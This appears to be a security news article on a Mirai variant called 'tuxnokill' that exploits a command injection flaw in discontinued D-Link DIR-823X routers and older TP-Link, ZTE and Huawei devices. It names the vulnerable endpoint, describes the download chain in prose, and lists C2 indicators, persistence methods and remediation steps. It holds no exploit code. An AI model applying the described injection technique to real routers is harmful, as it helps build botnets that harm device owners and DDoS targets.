Mirai Variant Targets End-of-Life D-Link Routers

Akamai's Security Intelligence Response Team has identified active exploitation of discontinued D-Link routers through a command injection vulnerability first disclosed over a year ago. The campaign deploys a Mirai variant called "tuxnokill" that announces its presence with the message: "nexuscorp has taken control."

The attacks target CVE-2025-29635, an 8.8 CVSS vulnerability affecting D-Link DIR-823X series routers running firmware versions 240126 and 24082. D-Link retired these devices in September 2025, leaving owners with no path to patches.

How the Attack Works

The vulnerability exists in the /goform/set_prohibiting endpoint. Attackers send crafted POST requests containing shell commands that the router executes without proper sanitization. The exploit downloads a shell script from external infrastructure, which then fetches the tuxnokill binary appropriate for the target's CPU architecture.

Akamai detected this activity against their honeypots beginning in early March 2026—the first confirmed active exploitation since the vulnerability's initial disclosure in March 2025. Security researchers Wang Jinshuai and Zhao Jiangting originally reported the flaw, but it took 13 months for threat actors to weaponize it at scale.

The same campaign also exploits CVE-2023-1389 targeting TP-Link Archer AX21 routers and an RCE vulnerability in ZTE ZXV10 H108L devices—casting a wide net across consumer networking equipment from multiple vendors.

Botnet Capabilities

Tuxnokill retains the core Mirai architecture: XOR-encoded configuration tables, a watchdog module to maintain persistence, and DDoS attack capabilities including TCP SYN/ACK/STOMP floods, UDP floods, and HTTP null attacks. The malware supports multiple CPU architectures, allowing it to infect diverse IoT devices beyond just routers.

After establishing a foothold, tuxnokill deletes its original binary to complicate forensic analysis. It persists through crontab scheduling and systemd service installation. The variant also carries hard-coded credential lists for Telnet brute-force attacks against other devices on the local network.

Secondary payloads exploit CVE-2017-17215 to spread to Huawei HG532 routers sharing the same network—a lateral movement technique that can rapidly expand the botnet's footprint within compromised environments.

Command and Control

Akamai published partial infrastructure details. The initial dropper originates from 88.214.20[.]14, while C2 communications flow to 64.89.161[.]130 on port 44300. The payload uses XOR encoding with key 0x30 and contains standard Mirai strings that make it easily identifiable to network defenders.

This infrastructure pattern mirrors what we've seen in npm supply chain attacks and other campaigns where threat actors maintain dedicated staging servers for initial payload delivery before pivoting to separate C2 channels for ongoing command execution.

Scale of Exposure

D-Link's DIR-823X series was popular in home and small business deployments. These routers remain in service despite reaching end-of-life status—their owners either unaware of the retirement notice or unwilling to replace functioning hardware. Consumer networking equipment historically sees low patch adoption rates even when updates exist.

The pattern repeats across IoT categories. Our coverage of Cisco ISE vulnerabilities and other enterprise network gear demonstrates that even managed infrastructure often lags on security updates. Unmanaged consumer devices face far worse outcomes.

Why This Matters

Mirai variants remain the dominant botnet family nearly a decade after the original source code leak. The malware's modular design makes it trivial for threat actors to add new exploits—CVE-2025-29635 required only minor integration work to join tuxnokill's arsenal.

For organizations defending against DDoS attacks, this campaign represents another increment in attacker resources. Each compromised router adds bandwidth to potential attack traffic. The same devices that can't receive patches will likely remain infected until they're physically replaced or disconnected.

Remediation

Owners of D-Link DIR-823X routers should replace the devices. No firmware update will fix CVE-2025-29635 because D-Link has discontinued support. As a temporary measure:

1. Disable remote administration interfaces
2. Change default administrative credentials to strong unique passwords
3. Monitor for unexpected outbound connections to unknown IP addresses
4. Consider network-level blocking of known C2 infrastructure

For more context on malware defense strategies, including network segmentation approaches that limit botnet impact, see our security guides.

Network administrators can add the published IOCs to detection systems and monitor for the "nexuscorp has taken control" string in device logs as an indicator of successful compromise.